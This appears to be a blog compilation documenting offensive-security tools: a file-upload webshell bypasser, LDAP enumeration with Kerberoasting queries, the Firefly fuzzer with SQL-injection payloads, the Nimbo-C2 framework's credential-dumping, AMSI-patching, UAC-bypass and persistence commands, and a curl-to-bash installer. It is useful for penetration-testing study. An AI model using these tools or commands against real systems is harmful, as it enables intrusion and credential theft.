 Required - Provide allowed extensions to be uploaded
Usage: -a / --allowed jpeg,png,zip, etc.

-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION

  Provide a remote path where the WebShell will be uploaded (won't work if the file will be uploaded with a UUID).
Usage: -l / --location /uploads/

-rl NUMBER, --rate-limit NUMBER

  Set rate limiting in milliseconds between each request.
Usage: -rl / --rate-limit 700

-p PROXY_NUM, --proxy PROXY_NUM

  Channel the HTTP requests via a proxy client (e.g. Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080

-S, --ssl

  If set, the tool will not validate TLS/SSL certificates.
Usage: -S / --ssl

-c, --continue

  If set, the brute force will continue even if one of the methods gets a hit!
Usage: -c / --continue

-E, --eicar

  If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar

-v, --verbose

  If set, details about the test will be printed on the screen
Usage: -v / --verbose

-r, --response

  If set, HTTP response will be printed on the screen
Usage: -r / --response

--version

  Print the current version of the tool.     

--update

  Checks for new updates. If there is a new update, it will be downloaded and updated automatically.     

Examples

Running the tool with Eicar and Bruteforce mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue

Running the tool with Webshell mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v

Running the tool with a Proxy client

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080


Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

By: Zion3R


Easy and customisable pentest report creator based on simple web technologies.

SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


Your Benefits

Write in markdown
Design in HTML/VueJS
Render your report to PDF
Fully customizable
Self-hosted or Cloud
No need for Word

SysReptor Cloud

You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

οš€
Sign up here


SysReptor Self-Hosted

You prefer self-hosting? That's fine! You will need:

  • Ubuntu
  • Latest Docker (with docker-compose-plugin)

You can then install SysReptor via script:

curl -s https://docs.sysreptor.com/install.sh | bash

After successful installation, access your application at http://localhost:8000/.

Get detailed installation instructions at Installation.





msLDAPDump - LDAP Enumeration Tool

By: Zion3R


msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping Python's ldap3 library in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool currently will not resolve hostnames that are not accessible via eth0.


Binding Anonymously

Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.
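
For context, an anonymous bind of the kind described takes only a few lines with ldap3. This is a minimal sketch with a placeholder domain controller address, not msLDAPDump's actual code:

from ldap3 import Server, Connection, ALL

# Anonymous (credential-less) simple bind against a domain controller
server = Server("10.0.0.5", get_info=ALL)
conn = Connection(server, auto_bind=True)

# The rootDSE exposes the domain naming context, DC hostnames, and more
print(server.info)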

Credentialed Bind

Users can bind to LDAP utilizing valid user account credentials or a valid NTLM hash. Using credentials will obtain the same information as the anonymous bind, as well as checking for the following:
  • Subnet scan for systems with ports 389 and 636 open
  • Basic Domain Info (Current user permissions, domain SID, password policy, machine account quota)
  • Users
  • Groups
  • Kerberoastable Accounts
  • ASREPRoastable Accounts
  • Constrained Delegation
  • Unconstrained Delegation
  • Computer Accounts - will also attempt DNS lookups on the hostname to identify IP addresses
  • Identify Domain Controllers
  • Identify Servers
  • Identify Deprecated Operating Systems
  • Identify MSSQL Servers
  • Identify Exchange Servers
  • Group Policy Objects (GPO)
  • Passwords in User description fields

Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.
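
To illustrate how such checks are typically expressed with ldap3 (a sketch with placeholder credentials and base DN, not the tool's internals), the Kerberoastable-accounts check essentially boils down to an LDAP filter on servicePrincipalName:

from ldap3 import Server, Connection, NTLM, SUBTREE

server = Server("10.0.0.5")
# ldap3's NTLM authentication also accepts an "LM:NT" hash string as the password
conn = Connection(server, user="CORP\\alice", password="Passw0rd!",
                  authentication=NTLM, auto_bind=True)

# Users with a servicePrincipalName set are candidates for Kerberoasting
conn.search("dc=corp,dc=local",
            "(&(objectClass=user)(servicePrincipalName=*))",
            search_scope=SUBTREE,
            attributes=["sAMAccountName", "servicePrincipalName"])
for entry in conn.entries:
    print(entry.sAMAccountName, entry.servicePrincipalName)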

  • Add support for LDAPS (LDAP Secure)
  • NTLM Authentication
  • Figure out why Unix only allows one adapter to make a call out to the LDAP server (removed resolution from Linux until resolved)
  • Add support for querying child domain information (currently does not respond nicely to querying child domain controllers)
  • Figure out how to link the name to the Description field dump at the end of the script
  • Implement command line options rather than inputs
  • Check for deprecated operating systems in the domain

Mandatory Disclaimer

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.



Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R


This tool is very helpful for finding vulnerabilities present in web applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generating malicious inputs and evaluating the application's responses.
    • These scanners are automated tools that scan web applications to look for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc. in order to scan ports, sites, hosts and networks to find vulnerabilities like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No.  Tool Name     Serial No.  Tool Name
1           whatweb       2           nmap
3           golismero     4           host
5           wget          6           uniscan
7           wafw00f       8           dirb
9           davtest       10          theharvester
11          xsser         12          fierce
13          dnswalk       14          dnsrecon
15          dnsenum       16          dnsmap
17          dmitry        18          nikto
19          whois         20          lbd
21          wapiti        22          devtest
23          sslyze

Working

Phase 1

  • The user has to run: python3 web_scan.py (https or http)://example.com
  • First, the program notes the start time of the run, then it builds the URL as "www.example.com".
  • After this step, the system checks the internet connection using ping.
  • Functionalities:
    • To open the help menu, use --help; to update, use --update
    • To skip the current scan/test: CTRL+C
    • To quit the scanner: CTRL+Z
    • The program reports the scanning time taken by the tool for each specific test.

Phase 2

  • From here the main function of the scanner starts:
  • The scanner will automatically select a tool and start scanning.
  • Scanners to be used and filename rotation (default: enabled)
  • The command used to initiate each tool (with parameters and extra params) is already given in the code
  • After finding a vulnerability in the web application, the scanner will classify it in a specific format:
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c (critical) denotes the most vulnerable systems, whereas l (low) denotes the least vulnerable.

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices. Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity, or availability of a target system without specialized access, user interaction, or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of the attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack. Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

  • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical

Vulnerabilities

  • After this, the scanner will show results which include:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now, the scanner will describe the harmful effects of that specific type of vulnerability.
  • The scanner points to sources (websites) to learn more about the vulnerabilities.
  • After this step, the scanner suggests some remedies to overcome the vulnerabilities.

Phase 3

  • The scanner will generate a proper report including:
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for the total scan
    • Details about each and every vulnerability
  • All scan output is written into SA-Debug-ScanLog for debugging purposes under the same directory
  • For debugging purposes, you can view the complete output generated by all the tools in SA-Debug-ScanLog.

Use

Run the program as: python3 web_scan.py (https or http)://example.com
For help: --help
To update: --update
Serial No.  Vulnerabilities to Scan        Serial No.  Vulnerabilities to Scan
1           IPv6                           2           Wordpress
3           SiteMap/Robot.txt              4           Firewall
5           Slowloris Denial of Service    6           HEARTBLEED
7           POODLE                         8           OpenSSL CCS Injection
9           FREAK                          10          Firewall
11          LOGJAM                         12          FTP Service
13          STUXNET                        14          Telnet Service
15          LOG4j                          16          Stress Tests
17          WebDAV                         18          LFI, RFI or RCE
19          XSS, SQLi, BSQL                20          XSS Header not present
21          Shellshock Bug                 22          Leaks Internal IP
23          HTTP PUT DEL Methods           24          MS10-070
25          Outdated                       26          CGI Directories
27          Interesting Files              28          Injectable Paths
29          Subdomains                     30          MS-SQL DB Service
31          ORACLE DB Service              32          MySQL DB Service
33          RDP Server over UDP and TCP    34          SNMP Service
35          Elmah                          36          SMB Ports over TCP and UDP
37          IIS WebDAV                     38          X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions , Feature Requests and Bug Reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub: @nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



Firefly - Black Box Fuzzer For Web Applications

By: Zion3R

Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

Note:

Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.


Advantages

  • Heavy use of goroutines and internal hardware for great performance
  • Built-in engine that handles each task for "x" response results inductively
  • Highly customizable to handle more complex fuzzing
  • Filter options and request verifications to avoid junk results
  • Friendly error and debug output
  • Built-in payloads (default lists are mixed with wordlists from SecLists)
  • Payload tampering and encoding functionality

Features


Installation

go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

If the above install method does not work, try the following:

git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Usage

Simple

firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Advanced usage

Request

Different types of request input that can be used

Basic

firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

Request with different methods and protocols

firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

Pipeline

echo 'http://example.com/?query=FUZZ' | firefly 

HTTP Raw

firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

This will send the raw HTTP request and auto-detect all GET and/or POST parameters to fuzz.

firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Request Verifier

The request verifier is the most important part. This feature lets Firefly learn the core behavior of the target you fuzz. It's important to do quality over quantity. More verify requests will lead to better quality, at the cost of performance (depending on your hardware).

firefly -u 'http://example.com/?query=FUZZ' -e 

Payloads

Payloads can be highly customized, and with a good core wordlist it's possible to fully adapt the payload wordlist within Firefly itself.

Payload debug

Display the format of all payloads and exit

firefly -show-payload

Tampers

List all tampers available

firefly -list-tamper

Tamper all payloads with a given type (more than one can be used, separated by commas)

firefly -u 'http://example.com/?query=FUZZ' -e s2c

Encode

Hex encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex

Hex then URL encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex,url

Payload regex replace

firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

The payloads ' or (1=1)-- - and " or(20=20)or " will result in ' or (13=(37-24))-- - and " or(13=(37-24))or ", where the => (with spaces) indicates the "replace to".

Filters

Filter options to filter/match requests that include a given rule.

Filter response to ignore (filter) status code 302 and line count 0

firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

Filter responses to include (match) regex, and status code 200

firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

Performance

Performance and time delays to use for the request process

Threads / Concurrency

firefly -u 'http://example.com/?query=FUZZ' -t 35

Time delay in milliseconds (ms) for each concurrency

firefly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

Wordlists

Wordlists that contain the payloads can be added separately or extracted from a given folder

Single Wordlist with its attack type

firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

Extract all wordlists inside a folder. The attack type depends on the suffix <type>_wordlist.txt

firefly -u 'http://example.com/?query=FUZZ' -w wl/

Example

Wordlists names inside folder wl :

  1. fuzz_wordlist.txt
  2. time_wordlist.txt

Output

JSON output is strongly recommended. This is because you can benefit from the jq tool to navigate through the results and compare them.

(If Firefly is pipeline-chained with other tools, standard plaintext may be a better choice.)

Simple plaintext output format

firefly -u 'http://example.com/?query=FUZZ' -o file.txt

JSON output format (recommended)

firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

Community

Everyone in the community is welcome to suggest new features, improvements and/or new payloads for Firefly. Just make a pull request or add a comment with your suggestions!



Kali Linux 2023.2 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2023.2. This release has various impressive updates.


The highlights of the changelog since March's release of 2023.1:

Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

By: Zion3R

About

Nimbo-C2 is yet another (simple and lightweight) C2 framework.

The Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR into the process). Nim is powerful, but interacting with Windows is much easier and more robust using PowerShell, hence this combination is used. The Linux agent is slimmer and capable only of basic commands, including ELF loading using the memfd technique.

All server components are written in Python:

  • HTTP listener that manages the agents.
  • Builder that generates the agent payloads.
  • Nimbo-C2 is the interactive C2 component that rules 'em all!

My work wouldn't be possible without the previous great work done by others, listed under credits.


Features

  • Build EXE, DLL, ELF payloads.
  • Encrypted implant configuration and strings using NimProtect.
  • Packing payloads using UPX and obfuscating the PE section names (UPX0, UPX1) to make detection and unpacking harder.
  • Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable by the config.jsonc).
  • Auto-completion in the C2 Console for convenient interaction.
  • In-memory Powershell commands execution.
  • File download and upload commands.
  • Built-in discovery commands.
  • Screenshot taking, clipboard stealing, audio recording.
  • Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
  • LSASS and SAM hives dumping.
  • Shellcode injection.
  • Inline .NET assemblies execution.
  • Persistence capabilities.
  • UAC bypass methods.
  • ELF loading using memfd in 2 modes.
  • And more !

Installation

Easy Way

  1. Clone the repository and cd into it
git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2
  2. Build the docker image
docker build -t nimbo-dependencies .
  3. cd again into the source files and run the docker image interactively, exposing port 80 and mounting the Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux, replace ${pwd} with $(pwd).
cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

Easier Way

git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies

Usage

First, edit config.jsonc for your needs.

Then run with: python3 Nimbo-C2.py

Use the help command for each screen, and tab completion.

Also, check the examples directory.

Main Window

Nimbo-C2 > help

--== Agent ==--
agent list -> list active agents
agent interact <agent-id> -> interact with the agent
agent remove <agent-id> -> remove agent data

--== Builder ==--
build exe -> build exe agent (-h for help)
build dll -> build dll agent (-h for help)
build elf -> build elf agent (-h for help)

--== Listener ==--
listener start -> start the listener
listener stop -> stop the listener
listener status -> print the listener status

--== General ==--
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Agent Window

Windows agent

Nimbo-2 [d337c406] > help

--== Send Commands ==--
cmd <shell-command> -> execute a shell command
iex <powershell-scriptblock> -> execute in-memory powershell command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Discovery Stuff ==--
pstree -> show process tree
checksec -> check for security products
software -> check for installed software

--== Collection Stuff ==--
clipboard -> retrieve clipboard
screenshot -> retrieve screenshot
audio <record-time> -> record audio

--== Post Exploitation Stuff ==--
lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
sam -> dump sam,security,system hives using reg.exe (elevation required)
shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
warning: make sure the assembly doesn't call any exit function

--== Evasion Stuff ==--
unhook -> unhook ntdll.dll
amsi -> patch amsi out of the current process
etw -> patch etw out of the current process

--== Persistence Stuff ==--
persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)

--== Privesc Stuff ==--
uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique

--== Interaction stuff ==--
msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
speak <text> -> speak using sapi.spvoice com interface

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Linux agent

Nimbo-2 [51a33cb9] > help

--== Send Commands ==--
cmd <shell-command> -> execute a terminal command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Post Exploitation Stuff ==--
memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
implant mode: load the elf as a child process and return
task mode: load the elf as a child process, wait on it, and get its output when it's done
(pass the whole commandline as a single string using quotes)

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Limitations & Warnings

  • Even though the HTTP communication is encrypted, the 'user-agent' header is in plain text and carries the real agent id, which some products may flag as suspicious.
  • When using the assembly command, make sure your assembly doesn't call any exit function, because it will kill the agent.
  • The shellc command may unexpectedly crash the injected process or change its behavior; test the shellcode and the target process first.
  • The audio, lsass and sam commands temporarily save artifacts to disk before exfiltrating and deleting them.
  • Cleaning up the persist commands should be done manually.
  • Specify whether to keep or kill the initiating agent process in the uac commands. The die flag may leave you with no active agent (if the unelevated agent thinks the UAC bypass was successful when it wasn't); keep should leave you with 2 active agents probing the C2, after which you should manually kill the unelevated one.
  • msgbox is blocking until the user presses the OK button.

Contribution

This software may be buggy or unstable in some use cases, as it is not fully and constantly tested. Feel free to open issues and PRs, and to contact me for any reason at (Gmail | Linkedin | Twitter).

Credits

  • OffensiveNim - Great resource that taught me a lot about leveraging Nim for implant tasks. Some of Nimbo-C2's agent capabilities are basically wrappers around modified OffensiveNim examples.
  • Python-Prompt-Toolkit-3 - Awesome library for developing Python CLI applications. The Nimbo-C2 interactive console was developed using it.
  • ascii-image-converter - For the awesome Nimbo ascii art.
  • All those random people from GitHub & StackOverflow whose code I copied & pasted.


Fuzztruction - Prototype Of A Fuzzer That Does Not Directly Mutate Inputs (As Most Fuzzers Do) But Instead Uses A So-Called Generator Application To Produce An Input For Our Fuzzing Target

By: Zion3R

Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called the consumer, but triggers unexpected behavior in deeper program logic. This makes it possible to fuzz even targets that utilize cryptographic primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.

For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments submodule documentation after reading this document.

Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.


Quickstart

# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of the experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# downloaded)
# Do NOT use this if you don't want to reproduce our results but instead fuzz
# your own targets (use the next command instead).
./env/pull-prebuilt.sh

# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh

# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env/start.sh

# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh

# Running start.sh a second time will automatically build the fuzzer.

# See `Fuzzing a Target using Fuzztruction` below for further instructions.

Components

Fuzztruction contains the following core components:

Scheduler

The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler directory.

Generator

The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.

The implementation of the generator can be found in the generator directory. It consists of two components that are explained in the following.

Compiler Pass

The compiler pass (generator/pass) instruments the target using so-called patch points. Since the current (tested on LLVM12 and below) implementation of this feature is unstable, we patch LLVM to enable them for our approach. The patches can be found in the llvm repository (included here as submodule). Please note that the patches are experimental and not intended for use in production.

The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs, which we also published on crates.io.

During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.

Agent

The agent, implemented in generator/agent, runs in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are implementing a forkserver and communicating with the scheduler. Based on the instructions passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.

Consumer

The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.
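As a rough sketch, instrumenting a typical autotools-based consumer could look like the following, assuming AFL++'s compiler wrappers are installed (the evaluation targets automate such steps in their respective config.sh files):

# Minimal sketch: build the consumer with AFL++ instrumentation
CC=afl-clang-fast CXX=afl-clang-fast++ ./configure
make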

Preparing the Runtime Environment (Docker Image)

Before using Fuzztruction, the runtime environment that comes as a Docker image is required. This image can be obtained by building it yourself locally or pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository, and all sub repositories, must be cloned:

git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

Local Build

The Fuzztruction runtime environment can be built by executing env/build.sh. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm directory.

Pre-built

In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh.

The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments submodule.

Managing the Runtime Environment Lifecycle

After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzer's environment lifecycle is managed by a set of scripts located in the env folder.

Script Description
./env/start.sh Spawns a new container, or spawns a shell into an already running container. Prebuilt: exporting USE_PREBUILT=1 spawns a container based on the pre-built environment. To switch from the pre-built to the locally built image (or vice versa), stop.sh must be executed first.
./env/stop.sh Stops the container. Remember to call this after rebuilding the image.

Using start.sh, an arbitrary number of shells can be spawned in the container. Visual Studio Code's Containers extension allows you to work conveniently inside the Docker container.

Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.

Runtime Environment Details

This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user and has passwordless sudo access by default.

Permissions: The Docker image's user is named user and has the same user ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, when using the pre-built image, this might not be the case, since the image was built on another machine. This must be considered when exchanging data with the host.

Inside the container, the following paths are (bind) mounted from the host:

Container Path Host Path Note
/home/user/fuzztruction ./ Pre-built: This folder is part of the image in case the pre-built image is used. Thus, changes are not reflected to the host.
/home/user/shared ./ Used to exchange data with the host.
/home/user/.zshrc ./data/zshrc -
/home/user/.zsh_history ./data/zsh_history -
/home/user/.bash_history ./data/bash_history -
/home/user/.config/nvim/init.vim ./data/init.vim -
/home/user/.config/Code ./data/vscode-data Used to persist Visual Studio Code config between container restarts.
/ssh-agent $SSH_AUTH_SOCK Allows using the SSH-Agent inside the container if it runs on the host.
/home/user/.gitconfig /home/$USER/.gitconfig Use gitconfig from the host, if there is any config.
/ccache ./data/ccache Used to persist ccache cache between container restarts.

Usage

After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. After spawning a shell inside the container using ./env/start.sh, the build process is triggered automatically. Thus, the steps in the next section are primarily for those who want to rebuild Fuzztruction after applying modifications to the code.

Building Fuzztruction

For building Fuzztruction, it is sufficient to call cargo build in /home/user/fuzztruction. This will build all components described in the Components section. The most interesting build artifacts are the following:

Artifacts Description
./generator/pass/fuzztruction-source-llvm-pass.so The LLVM pass used to insert the patch points into the generator application. Note: The location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, please run sudo ldconfig and retry using a freshly spawned shell.
./generator/pass/fuzztruction-source-clang-fast A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the targets against the agent, and injects a call to the agent's init method into the generator's main.
./target/debug/libgenerator_agent.so The agent that is injected into the generator application.
./target/debug/fuzztruction The fuzztruction binary representing the actual fuzzer.

Fuzzing a Target using Fuzztruction

We will use libpng as an example to showcase Fuzztruction's capabilities. Since libpng is relatively small and has no external dependencies, the pre-built image is not required for the following steps. However, building the AFL++ binary may take up to several hours, especially on mobile CPUs, because of the collision-free coverage-map encoding feature and comparison splitting.

Building the Target

Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/ directory and execute ./build.sh libpng. This will pull the source and start the build according to the steps defined in libpng/config.sh.

Benchmarking the Target

Using the following command

sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml  --purge --show-output benchmark -i 100

allows testing whether the target works. Each target is defined using a YAML configuration file. The files are located in the configurations directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml file is extensively documented.
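As a rough orientation, a configuration skeleton might look like the following. This is a hypothetical sketch: only the work-directory attribute and the sink's env section are referenced elsewhere in this document, so consult pngtopng-pngtopng.yml for the authoritative schema.

# Hypothetical skeleton -- see pngtopng-pngtopng.yml for the real schema
work-directory: /tmp/pngtopng-pngtopng
# generator and sink (consumer) command lines, seeds, and environment
# variables (e.g., AFL_DEBUG in the sink's env section) are defined here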

Troubleshooting

If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts.

  • Passing --show-output to fuzztruction allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.
  • Setting AFL_DEBUG in the env section of the sink in the YAML config can give you a more detailed output regarding the consumer.
  • Executing the generator and consumer using the same flags as in the config file might reveal any typo in the command line used to execute the application. In the case of using LD_PRELOAD, double check the provided paths.

Running the Fuzzer

To start the fuzzing process, executing the following command is sufficient:

